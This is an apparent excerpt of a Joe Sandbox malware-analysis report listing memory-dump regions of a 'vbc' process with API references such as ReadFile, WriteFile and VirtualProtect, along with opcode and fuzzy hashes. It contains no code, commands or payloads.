• Instruction Fuzzy Hash: A79123B0E007099FDB24DF69D441B9ABBF1BF48304F10992AE48AE7B90D734E945CB95
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• SetFilePointerEx.KERNELBASE ref: 00F4FE66
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0

Control-flow Graph (rendered graph not reproduced in text)

Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• SetFilePointerEx.KERNELBASE ref: 00F4BDD4
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 070BF564
Memory Dump Source
• Source File: 00000009.00000002.2669985021.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_70b0000_vbc.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
• WriteFile.KERNELBASE(?,?,0000004C), ref: 00F4B042
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• GetModuleHandleW.KERNELBASE(?), ref: 09F1D6BA
Memory Dump Source
• Source File: 00000009.00000002.2755656125.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_9f10000_vbc.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fb7ea9a2a92149bdc215ad818d6e2914b5d6b7efd128aa789b29b73cc8591988
                                                                                                                                                                      • Instruction ID: 4df9be2dfe3b97fe76e61db06c57ef25bab7ff86800e7fde6ca91389b88158ea
                                                                                                                                                                      • Opcode Fuzzy Hash: fb7ea9a2a92149bdc215ad818d6e2914b5d6b7efd128aa789b29b73cc8591988
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E21B134D087898FDB298E18C09463ABFA0BF91774F5848B9ED4D4A261D7348D4EB742
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: dc72eaa7cad9d6f175ed41f62ed7a08c3eea0282c80f4b4cd629aaf453f3e17d
                                                                                                                                                                      • Instruction ID: 091412adfc9a8c0a7db44332d0d97dea5d3476587ea84877626657eb6874950c
                                                                                                                                                                      • Opcode Fuzzy Hash: dc72eaa7cad9d6f175ed41f62ed7a08c3eea0282c80f4b4cd629aaf453f3e17d
                                                                                                                                                                      • Instruction Fuzzy Hash: 23217121D0C3846ACF368A288C54775BFA89BA2374F4D408AEC90862A7D379CD04F762
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4BDD4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 3fbf9660bd707454e24f3d31928af1fc381ea1d942e73c690010abf11ea828c7
                                                                                                                                                                      • Instruction ID: 9dc75d08423d5073264e2e8dddd13949ad2e98fcbcf93dc9b68fe79cb7906a75
                                                                                                                                                                      • Opcode Fuzzy Hash: 3fbf9660bd707454e24f3d31928af1fc381ea1d942e73c690010abf11ea828c7
                                                                                                                                                                      • Instruction Fuzzy Hash: 6521A161C0D7414FDB265E3988992753FA0AB62331F49459ADD80CA167E728CC05BB52
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4F6E1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 1cba29fd25db952e43673c313fcce072412cc756ed8c462d05c25f2761ff4269
                                                                                                                                                                      • Instruction ID: 355d039d88271ac1d7bc024db183a42c1150b7b7bf65e3536b5b8342151634bc
                                                                                                                                                                      • Opcode Fuzzy Hash: 1cba29fd25db952e43673c313fcce072412cc756ed8c462d05c25f2761ff4269
                                                                                                                                                                      • Instruction Fuzzy Hash: 30219F65D0D3C25FDB324B1488546766FA07FA3734F4E46AADCA4850E3E6689C0CB312
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 935beb9be1ea7728b73972e20dd7a0a746ede8f80c1c2e344ca367b1ab3febd4
                                                                                                                                                                      • Instruction ID: 6c6d9d22b217441b7eb501e3b331dc0c2b3820ebc25515f2bb9f84ea6a49f994
                                                                                                                                                                      • Opcode Fuzzy Hash: 935beb9be1ea7728b73972e20dd7a0a746ede8f80c1c2e344ca367b1ab3febd4
                                                                                                                                                                      • Instruction Fuzzy Hash: 83213721C4E3409BD7B682584D5877A7FA0AB61770F4C244DDC844B9A2D6A5AC06B3A3
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNELBASE(?,00000000,?), ref: 00F4C65E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 038f3b6879a995de064d936d589c0d7a2b7ed9833ebd4d32dd9939c3d0bcac3f
                                                                                                                                                                      • Instruction ID: dd793026af93d38a1441f80178739ed27daba7ef1bc41f296d222d2cec4b64cf
                                                                                                                                                                      • Opcode Fuzzy Hash: 038f3b6879a995de064d936d589c0d7a2b7ed9833ebd4d32dd9939c3d0bcac3f
                                                                                                                                                                      • Instruction Fuzzy Hash: AF112366D8E3825FDB2A17645C453BA3F705F62331F4C15A2ED82854A3EA448C06B253
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNELBASE(?,00000000,?), ref: 00F4C65E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: f2b4a235e06b263164734e0d39665d53f089e7e10f2ac264a28c8bf9afc276ab
                                                                                                                                                                      • Instruction ID: e69b32232031abedd38d1619a4e778234b82551a21d96d38d0d6e863dcc44432
                                                                                                                                                                      • Opcode Fuzzy Hash: f2b4a235e06b263164734e0d39665d53f089e7e10f2ac264a28c8bf9afc276ab
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E117C11D8E3C25FE767066868152763F745E23331F091493DC82CA8A3E6458C09B363
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F4E8D6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: a69287a9640d5f6327c1b7379543b300b90b9d05c5caf2fe588bdf46a1eaba6c
                                                                                                                                                                      • Instruction ID: 8f99fca9d83f08831c52e4176086f9174029f0a92dbeca627ad4f6a20520edac
                                                                                                                                                                      • Opcode Fuzzy Hash: a69287a9640d5f6327c1b7379543b300b90b9d05c5caf2fe588bdf46a1eaba6c
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A012872D082419BDF308B088849ABA3F20FBA4B70F1C461EFC95821E1D2319C08B753
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                      • Opcode ID: 703d17691b7307e70f2b25997b32f1b3fcb8a4cb8797505cf654474dc3d83484
                                                                                                                                                                      • Instruction ID: 1dcb48a9d9681834de311f264824b61b88df4cbc8c7acf79fb6d27e02704759f
                                                                                                                                                                      • Opcode Fuzzy Hash: 703d17691b7307e70f2b25997b32f1b3fcb8a4cb8797505cf654474dc3d83484
                                                                                                                                                                      • Instruction Fuzzy Hash: FDF0C838E4430466EB2099144C07ABA7D9CB7E0F75FC448A5FC8542091E7D9EE087523
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4BDD4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 4e4fd54514973512f93265a61edde18862c82f0d621bb6a14100ced0b0be0415
                                                                                                                                                                      • Instruction ID: e76f0a02a90c15d51ee4890b01759445ccf6e737a6174d91f75c188ff59553b3
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e4fd54514973512f93265a61edde18862c82f0d621bb6a14100ced0b0be0415
                                                                                                                                                                      • Instruction Fuzzy Hash: E201D262C0E3415ECB258F2988983747FA0AB62330F4D49CADEC48A1A7E324CC04BB52
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4608C
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: b13e0412e8888e6e6b355afdb1a5a6be3d08ea1c8c8991775394c3ecf76f0cba
• Instruction ID: f62eba5c49047b8f5b42727ff45058438ccb61b4170a3d9d3feb4d45e248eb28
• Opcode Fuzzy Hash: b13e0412e8888e6e6b355afdb1a5a6be3d08ea1c8c8991775394c3ecf76f0cba
• Instruction Fuzzy Hash: 09016DA1D0D7409FCB259B2884043767FB06F97B70F098A8AAD85DB1A3D6308C08BB53
APIs
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: c6af43f2f85737f6ed52366144c0663ce167c6942f7f6ca1091dfd0fcd1bc8ae
• Instruction ID: 973d5856be2afc6d86483889751ae7535cce9c0b0948bb71347feb621388e322
• Opcode Fuzzy Hash: c6af43f2f85737f6ed52366144c0663ce167c6942f7f6ca1091dfd0fcd1bc8ae
• Instruction Fuzzy Hash: 3CF0F630E493810FDF628A2888947787FA5BF56B20F5D0496EC40C71E1E925DC04F327
APIs
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
• Opcode ID: b81e6726e7147134c5d74f3e289a5222736921b2bcb811c31b0f5190a8d0d9be
• Instruction ID: b720d42e05ff71231fddd29bc223a5106769c5b1385075e5754d6333c79243f1
• Opcode Fuzzy Hash: b81e6726e7147134c5d74f3e289a5222736921b2bcb811c31b0f5190a8d0d9be
• Instruction Fuzzy Hash: 75F03C72D0D3869FDB228F209C106757F68AB96730F09089AED408A1A3D324CD19F722
APIs
• SetFilePointerEx.KERNELBASE ref: 00F4BDD4
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 35603b09a704741041ff778f85f582e6087e8fec906d7224514772899d4b8579
• Instruction ID: 1f177e49a8a084a2d01d8957d0fe77fc11140831e30de39e6d3aa208fb73e1ee
• Opcode Fuzzy Hash: 35603b09a704741041ff778f85f582e6087e8fec906d7224514772899d4b8579
• Instruction Fuzzy Hash: FD01C261C0D3819ED726DF2D842832B7FE05BA2334F49498DE9C086197D379C94DA793
APIs
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 56bbaf3b29c88dc6c1b99d7b31f1087f21b7f7da1fe97c986e51aeb79dcd7c26
• Instruction ID: 44c4f850ae16f973a5e01601b7ab34ce1d694cd806f4309cdb16fa041ec16eaf
• Opcode Fuzzy Hash: 56bbaf3b29c88dc6c1b99d7b31f1087f21b7f7da1fe97c986e51aeb79dcd7c26
• Instruction Fuzzy Hash: 80F08C21D0B2409FEB718A28C808A7D7FA96741374F8C6566EC60970B1E738CD05BBE2
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 493af7f4ab494f1ccc7a1dd380d7c0188d1ade502655c4d8e2487eaf449b3dbd
• Instruction ID: d12a1df10958b5618ecd60aa7bca07b2faea503528aa3477e09810e82329b7c6
• Opcode Fuzzy Hash: 493af7f4ab494f1ccc7a1dd380d7c0188d1ade502655c4d8e2487eaf449b3dbd
• Instruction Fuzzy Hash: 24F02732C08202E6DB318A58CC04B7A7E507790330F290B3BFE2D400E1E6755D0CB643
APIs
• GetUserDefaultUILanguage.KERNELBASE ref: 00F44B76
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: DefaultLanguageUser
• String ID:
• API String ID: 95929093-0
• Opcode ID: ee86f944570715989b0705386ccc5728ae79186a4a2428f9d2f7adef46ef7b6a
• Instruction ID: a0c960a950a385429ac3e0259bafe29ee2421d745cb74183f7cd8a7ac04d02d5
• Opcode Fuzzy Hash: ee86f944570715989b0705386ccc5728ae79186a4a2428f9d2f7adef46ef7b6a
• Instruction Fuzzy Hash: 90E0922AD09542A6DE3183288D96374AE10BB11331FDD0693AE22B78E78659BE81B553
APIs
• ReadFile.KERNELBASE(?,00000000,?), ref: 00F4C65E
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: cb2ed9525345ef2913c2e152d8086b1a1c9c680d5159840467a551f06320751a
• Instruction ID: 6b996d15a69a1e340430e126569453f933278961644ffda1ae1a1d6949769b23
• Opcode Fuzzy Hash: cb2ed9525345ef2913c2e152d8086b1a1c9c680d5159840467a551f06320751a
• Instruction Fuzzy Hash: F2F0652440E3C66FD753077498197A67FE5AF63374F096486DC80C6063E7948C15E752
APIs
• SetFilePointerEx.KERNELBASE ref: 00F4FE66
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: b99228d8cf271417cf073ae8d4e1b06aa863b2fb9f8ef7031e383e05b5f96f58
• Instruction ID: 5e89fbe73306df4d4af3328a10da4916a1fd3834fb4cad9d8b5cff3707c80ea5
• Opcode Fuzzy Hash: b99228d8cf271417cf073ae8d4e1b06aa863b2fb9f8ef7031e383e05b5f96f58
• Instruction Fuzzy Hash: 17E0E521C04711ABC3204B09CC1DB3BBEE8AF91737F5A480CDF8845061CBB08C0CB692
APIs
• SetFilePointerEx.KERNELBASE ref: 00F4B08B
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 31ff1c43965f2e2b8abaeb18ab7e281c92f1a9e53eb879baaf3707e51aa944b5
• Instruction ID: f0a362037ddf045f9f44d5e4f0454fe9ffb7d72f61de25cfa092ab0ecd3dfd57
• Opcode Fuzzy Hash: 31ff1c43965f2e2b8abaeb18ab7e281c92f1a9e53eb879baaf3707e51aa944b5
• Instruction Fuzzy Hash: 66E0EDB5E49300CBE7258B468818B37BF608FA2731F08820DDC36462E2C3789C09AA13
APIs
• SetFilePointerEx.KERNELBASE ref: 00F49A3D
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: cfe07ba302f4376a22d07a112c96459957e6b163bd0db5c98f841ea20d534aa5
• Instruction ID: 2efe3475fe741e42b69d6f7d659dcbff08d4f7e4f0d29bec9ef4f79b41e566b3
• Opcode Fuzzy Hash: cfe07ba302f4376a22d07a112c96459957e6b163bd0db5c98f841ea20d534aa5
• Instruction Fuzzy Hash: 22E0E56694E3C25FD30307601C252A13FB09E43110B5A89D7D8C48A4A3C21C151EDB23
APIs
• SetFilePointerEx.KERNELBASE ref: 00F4B33B
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 008f1bf14851344518dde056cf710bcf0cc768ad2770c8415756519478260f85
• Instruction ID: 8d9d1be8a1149b087fa6b9f0103dd7012d890e57a97ec258a9824b0febecd480
• Opcode Fuzzy Hash: 008f1bf14851344518dde056cf710bcf0cc768ad2770c8415756519478260f85
• Instruction Fuzzy Hash: 16F0157044E3C59FE7024F6198283697FB0AF93210F9942CBD8A18B1E3C3788508EB62
APIs
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FileRead
• String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 1dd650de6be0da22d35deb2c002320e127e27ae010829eccbdbc551b8856c8e1
                                                                                                                                                                      • Instruction ID: 98f06221d318bb7809733c0d2bd4f0623db682a6c01667779574cee33f906984
                                                                                                                                                                      • Opcode Fuzzy Hash: 1dd650de6be0da22d35deb2c002320e127e27ae010829eccbdbc551b8856c8e1
                                                                                                                                                                      • Instruction Fuzzy Hash: 0AE0DF30F0DA12ABC6268E648889EB77FA5FF91B24F64051CEC518B090CBE4D805F751
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4E7B4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 7d3d6f5b5f969928d95597f190341564c11489168e90df52aadd8b860d18d205
                                                                                                                                                                      • Instruction ID: b385b493ab8d871ae189ad99a69af4b09dc9f1a0140d401270a055603cf60ab4
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d3d6f5b5f969928d95597f190341564c11489168e90df52aadd8b860d18d205
                                                                                                                                                                      • Instruction Fuzzy Hash: 66E09231D0EB864ADB664A2A880A3A53FA07F233B0B09479ADCF5861D1C710D918E711
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: dd9a96de33f04dbe398beb7b31e344418af4a9b6ee74816e1c1b8e1da8412f3c
                                                                                                                                                                      • Instruction ID: 25ff7f77a564519a33817498f55df453a8e28b98deb88b53226a0a1494db8521
                                                                                                                                                                      • Opcode Fuzzy Hash: dd9a96de33f04dbe398beb7b31e344418af4a9b6ee74816e1c1b8e1da8412f3c
                                                                                                                                                                      • Instruction Fuzzy Hash: F9E08C33E082825BCB114B689C145A87F24EA91331F080466EE00C6067D325CE08EB91
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F49A3D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 29c4b7febdfc29949c08a1ed2fbf76035dac491a96ddd8eb9a922fcfe4cc18ca
                                                                                                                                                                      • Instruction ID: 0410960e9744f42ec5a852d9ede0bda64faa1f0371abe6649d8569dd93e526d6
                                                                                                                                                                      • Opcode Fuzzy Hash: 29c4b7febdfc29949c08a1ed2fbf76035dac491a96ddd8eb9a922fcfe4cc18ca
                                                                                                                                                                      • Instruction Fuzzy Hash: F8E04F7094C7429FD3024F208804397BFE0FF96724F409949EDC485041E7BC4484EB43
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4A5FB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 023de8fbe69e681f3e0e9196a55ee3b372ff6bf1a5cae3c5879f434fbf31ccfe
                                                                                                                                                                      • Instruction ID: f75a79706c9793484096915f1f88ffb5c19f5312633280ec62d1cbd8a029708c
                                                                                                                                                                      • Opcode Fuzzy Hash: 023de8fbe69e681f3e0e9196a55ee3b372ff6bf1a5cae3c5879f434fbf31ccfe
                                                                                                                                                                      • Instruction Fuzzy Hash: 91D0A9B2A0C7018BD700CF00988837AFBE0FB85310F00982EEA8A02280E7B54488FB03
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F4B82E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
